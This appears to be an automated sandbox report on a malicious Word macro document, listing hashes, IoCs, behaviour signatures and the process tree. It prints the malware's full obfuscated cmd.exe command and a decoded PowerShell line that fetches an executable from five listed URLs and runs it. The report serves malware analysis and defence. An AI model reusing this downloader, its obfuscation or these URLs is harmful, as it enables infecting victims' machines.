Analysis
-
max time kernel
143s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21-05-2024 14:39
Behavioral task
behavioral1
Sample
63a5df4ae97bb27edf5bd67659935560_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
63a5df4ae97bb27edf5bd67659935560_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
63a5df4ae97bb27edf5bd67659935560_JaffaCakes118.doc
-
Size
176KB
-
MD5
63a5df4ae97bb27edf5bd67659935560
-
SHA1
782ac721cedd47fd6c2a0ef1c6d5d637a70fed20
-
SHA256
f32bb24d114407e601968a2908030e4e12277051ed2d439efb99bf63204ad4b8
-
SHA512
d329521898b9e1d70cfd32f7546bb875685430ed1b00b3a2cbdd9c2f545754edc1082d4466d84ba77914eba7081f4449536191fb05162137e86577d57f73a053
-
SSDEEP
3072:BxjnB29gb8onegCZ4B9s5l7sOB/izw2RW0ntt:Bxy3HM9Q5ERW
Malware Config
Extracted
http://coopspage.com/fLCt
http://butterbean.se/KKHaZ8Oh
http://boutique-amour.jp/958Jf
http://bike-nomad.com/wp-content/jBN92RTl
http://websitedesigngarden.com/fmkE
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1572 520 Cmd.exe WINWORD.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 35 2136 powershell.exe 37 2136 powershell.exe 39 2136 powershell.exe 42 2136 powershell.exe 44 2136 powershell.exe 46 2136 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
Cmd.execmd.exepid process 1572 Cmd.exe 2172 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 520 WINWORD.EXE 520 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2136 powershell.exe 2136 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2136 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 520 WINWORD.EXE 520 WINWORD.EXE 520 WINWORD.EXE 520 WINWORD.EXE 520 WINWORD.EXE 520 WINWORD.EXE 520 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WINWORD.EXECmd.execmd.exedescription pid process target process PID 520 wrote to memory of 1572 520 WINWORD.EXE Cmd.exe PID 520 wrote to memory of 1572 520 WINWORD.EXE Cmd.exe PID 1572 wrote to memory of 2172 1572 Cmd.exe cmd.exe PID 1572 wrote to memory of 2172 1572 Cmd.exe cmd.exe PID 2172 wrote to memory of 2136 2172 cmd.exe powershell.exe PID 2172 wrote to memory of 2136 2172 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\63a5df4ae97bb27edf5bd67659935560_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd wZRiwhJfF uoGFDZmwViVVuSwozQbK fiwFOrHBht & %co^m^S^p^E^c% /c ^c^M^d; ; ; /^V^ ^ ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ 1^ym}^cAh}AKM{9^20hVR^vcrbBtdQU^azr8^c^5vL}P6T; s8k^7Jia6ov^e^E^sY^rT^Xob80t;s^K^jjGWrZm1eSXBY$^4^K^l z^T8s^wBGs^5U2e^x^bscAWJolYmrXO^hPW^P^x^-QyAthCWrR^kh^aTIttBA^w^Sy^Dp^;kN5^)^8w^1jDvUZHcX^Se1n^$VR^w l^VG^,5oyzP^iHcc^o^B^WGSd$J^l ^(3Sh^e^opwlgUTin^vm^Fc^4MdSAwa^2T^Yon^pJlUN^Hn6Hrw4JUoF2^ZD^LDh.^K29^fH^51ic^ya^dOV9$HQu{^S^5DyFXDrD1xt5Gx{OPV^)^2VQhhe^7rK6Vzdw^X$vF^z 3^TPn3C4^i7Pz w^RTznKpc^1^V Wh^9z$nM^8^(^7ESh9^M^Hc^UEBaC9^Ze^V76^r^re^hoKlAfi7^P^;op^T'p9^resJP^x^y^8Fe^k^bN.^I^L^M^'G^z5+Y^I9YywZbnA^Xdcsd$Ox^u^+InW'6Qc\Xg^0'2eN+u^sMpv^m8mqY0^e^w6Ctk^zh:f^OSvOLenOK^qe53^F$tlu=gV^Ej4a^WZIi^d^S9x^Z$nc^v^;e4S'Tim9^D^ ^M0^ekI^1Dfe^'eih 9ci=U^I^s^ io0Y0O^GbX1^YdvVM$^9te;^O^0Y^)Ox9'3gI@0^u^p'b^ j^(8S t81si^Q^Ip^lae^ApE lSkWx.ARI^'^IgtEAg^R^kl^cLmcM^UfWQz/^X^74^m^2Qto^t^oPcCn^c.rGCnPUEe7^LQdr8^srw^8Ya^k^gvg 43nJHEg4E^ziJy3sa9^O^egFnd^P^C8ep3OtLD^I^iA^a3sS^e^lbOnLef6hw^78^H/RvJ/^s^q^t:v^IHpO^YEtH3qt^f^jdhq^8^l^@^U^18lb^J^tTW^YsR^bqG2^WvI9ZaBNX5GBEDdjp^wZ/^F^Pc^tZY^wnwMhe2TCtk2tn34 ^o^lmUcNgi-^yr^Vp^E^g^T^wKg /Wtrmu^iZoyR^9^c^XBJ.xO^FdXb8ajcgmCM^Ko^S^Wtn^MOK-^d9^2^eRcok0^Cn^i9u ^bTs9/61^0/W^s^O:nEipvBot2PHtV^GA^h31w^@^jBkftCyJ9CH85^z25v^ph909Z^/iYFpfq^ijib^u.Qp^vrygqua2q^ohOAmL^wpa^b^jY^-L^ PeL5v^u^cM^pq2Fgia1^T^tF^JTunAV^oQWZbF3^9/Ti^5/sA5^:^G9Yp2cAtW^Plt^xLHh^RzS^@OtBhqW^dOjAc8ZE^uZ^Oq3aI^K^QH2^5f^Kt1FKyAQ/^ApC^eoijsBrv^.xgEnCjaa2y6e9S0^bgTlrQHbe^etzt6z^Ot5^h^AuX8cbi^Xk^/ynC/Z9^6^:^4Ecp^y E^t^fy^wt^HKWhhtd@^V18tgJMCbQUL^X^7PfN^Fj/^BP^WmMlr^ohHlcCm^j.^g4reZKr^gs4^OaaIMpyOhss^Cxp^WyOo^DAtoC^StcsCO/iM5/ylA:^XaNpiXAt^fU1to Nh^miG'3Qc=4^yLhK^Rgr^kyU^zi6^8^$X9a;tDRtseHnOy^T^eK^M^L^i6^EMlL8^1C^1^u^Sbw0re^l^0^U^WtM8.Qwi^t^q^7^Q^eO^UNNR52 ^SL^Ht^DY2c^Ay^m^eDL1^jXe9bgE^u^o^M^Jk-TwCwK^5^YeUkSn 47=ZoqfayOisn^kdq^i^z^$qL^B gmil8^6flQ^2Ceu^PBh^c^krsu34rCplex9twDhx^ow^S8p)&& ; ; fo^r ; ; ; /^L ; %^D ; ;; in ; ; (^ ; ^ ; ^1499^ -4 ^ +3) ; ; ; D^O ; ( ; ( ; ( ; ^SET 7^z=!7^z!!Wt^b:~%^D, 1!) ) )& ; ; i^f; ;; %^D;; ; ; ; ; ^Eq^u;^3 ;; ( ( (CA^L^L;; %7^z:^*7^z^!=% ) ; ) ; ) "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execMd ; ; ; /V ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ 1^ym}^cAh}AKM{9^20hVR^vcrbBtdQU^azr8^c^5vL}P6T; s8k^7Jia6ov^e^E^sY^rT^Xob80t;s^K^jjGWrZm1eSXBY$^4^K^l z^T8s^wBGs^5U2e^x^bscAWJolYmrXO^hPW^P^x^-QyAthCWrR^kh^aTIttBA^w^Sy^Dp^;kN5^)^8w^1jDvUZHcX^Se1n^$VR^w l^VG^,5oyzP^iHcc^o^B^WGSd$J^l ^(3Sh^e^opwlgUTin^vm^Fc^4MdSAwa^2T^Yon^pJlUN^Hn6Hrw4JUoF2^ZD^LDh.^K29^fH^51ic^ya^dOV9$HQu{^S^5DyFXDrD1xt5Gx{OPV^)^2VQhhe^7rK6Vzdw^X$vF^z 3^TPn3C4^i7Pz w^RTznKpc^1^V Wh^9z$nM^8^(^7ESh9^M^Hc^UEBaC9^Ze^V76^r^re^hoKlAfi7^P^;op^T'p9^resJP^x^y^8Fe^k^bN.^I^L^M^'G^z5+Y^I9YywZbnA^Xdcsd$Ox^u^+InW'6Qc\Xg^0'2eN+u^sMpv^m8mqY0^e^w6Ctk^zh:f^OSvOLenOK^qe53^F$tlu=gV^Ej4a^WZIi^d^S9x^Z$nc^v^;e4S'Tim9^D^ ^M0^ekI^1Dfe^'eih 9ci=U^I^s^ io0Y0O^GbX1^YdvVM$^9te;^O^0Y^)Ox9'3gI@0^u^p'b^ j^(8S t81si^Q^Ip^lae^ApE lSkWx.ARI^'^IgtEAg^R^kl^cLmcM^UfWQz/^X^74^m^2Qto^t^oPcCn^c.rGCnPUEe7^LQdr8^srw^8Ya^k^gvg 43nJHEg4E^ziJy3sa9^O^egFnd^P^C8ep3OtLD^I^iA^a3sS^e^lbOnLef6hw^78^H/RvJ/^s^q^t:v^IHpO^YEtH3qt^f^jdhq^8^l^@^U^18lb^J^tTW^YsR^bqG2^WvI9ZaBNX5GBEDdjp^wZ/^F^Pc^tZY^wnwMhe2TCtk2tn34 ^o^lmUcNgi-^yr^Vp^E^g^T^wKg /Wtrmu^iZoyR^9^c^XBJ.xO^FdXb8ajcgmCM^Ko^S^Wtn^MOK-^d9^2^eRcok0^Cn^i9u ^bTs9/61^0/W^s^O:nEipvBot2PHtV^GA^h31w^@^jBkftCyJ9CH85^z25v^ph909Z^/iYFpfq^ijib^u.Qp^vrygqua2q^ohOAmL^wpa^b^jY^-L^ PeL5v^u^cM^pq2Fgia1^T^tF^JTunAV^oQWZbF3^9/Ti^5/sA5^:^G9Yp2cAtW^Plt^xLHh^RzS^@OtBhqW^dOjAc8ZE^uZ^Oq3aI^K^QH2^5f^Kt1FKyAQ/^ApC^eoijsBrv^.xgEnCjaa2y6e9S0^bgTlrQHbe^etzt6z^Ot5^h^AuX8cbi^Xk^/ynC/Z9^6^:^4Ecp^y E^t^fy^wt^HKWhhtd@^V18tgJMCbQUL^X^7PfN^Fj/^BP^WmMlr^ohHlcCm^j.^g4reZKr^gs4^OaaIMpyOhss^Cxp^WyOo^DAtoC^StcsCO/iM5/ylA:^XaNpiXAt^fU1to Nh^miG'3Qc=4^yLhK^Rgr^kyU^zi6^8^$X9a;tDRtseHnOy^T^eK^M^L^i6^EMlL8^1C^1^u^Sbw0re^l^0^U^WtM8.Qwi^t^q^7^Q^eO^UNNR52 ^SL^Ht^DY2c^Ay^m^eDL1^jXe9bgE^u^o^M^Jk-TwCwK^5^YeUkSn 47=ZoqfayOisn^kdq^i^z^$qL^B gmil8^6flQ^2Ceu^PBh^c^krsu34rCplex9twDhx^ow^S8p)&& ; ; fo^r ; ; ; /^L ; %^D ; ;; in ; ; (^ ; ^ ; ^1499^ -4 ^ +3) ; ; ; D^O ; ( ; ( ; ( ; ^SET 7^z=!7^z!!Wt^b:~%^D, 1!) ) )& ; ; i^f; ;; %^D;; ; ; ; ; ^Eq^u;^3 ;; ( ( (CA^L^L;; %7^z:^*7^z^!=% ) ; ) ; ) "3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dif=new-object Net.WebClient;$zrh='http://coopspage.com/fLCt@http://butterbean.se/KKHaZ8Oh@http://boutique-amour.jp/958Jf@http://bike-nomad.com/wp-content/jBN92RTl@http://websitedesigngarden.com/fmkE'.Split('@');$dbY = '109';$SZj=$env:temp+'\'+$dbY+'.exe';foreach($Wcz in $zrh){try{$dif.DownloadFile($Wcz, $SZj);Start-Process $SZj;break;}catch{}}4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\109.exeFilesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0
-
C:\Users\Admin\AppData\Local\Temp\TCD9241.tmp\sist02.xslFilesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcuuzkmp.v3y.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/520-10-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-7-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-3-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-20-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-8-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-22-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-0-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-12-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-15-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-16-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-14-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-17-0x00007FF8F32D0000-0x00007FF8F32E0000-memory.dmpFilesize
64KB
-
memory/520-13-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-11-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-19-0x00007FF8F32D0000-0x00007FF8F32E0000-memory.dmpFilesize
64KB
-
memory/520-18-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-592-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-4-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-6-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-9-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-60-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-62-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-63-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-593-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-5-0x00007FF935B4D000-0x00007FF935B4E000-memory.dmpFilesize
4KB
-
memory/520-1-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-2-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-549-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-568-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-569-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/520-590-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-591-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-589-0x00007FF8F5B30000-0x00007FF8F5B40000-memory.dmpFilesize
64KB
-
memory/520-21-0x00007FF935AB0000-0x00007FF935CA5000-memory.dmpFilesize
2.0MB
-
memory/2136-65-0x00000269C3F10000-0x00000269C3F32000-memory.dmpFilesize
136KB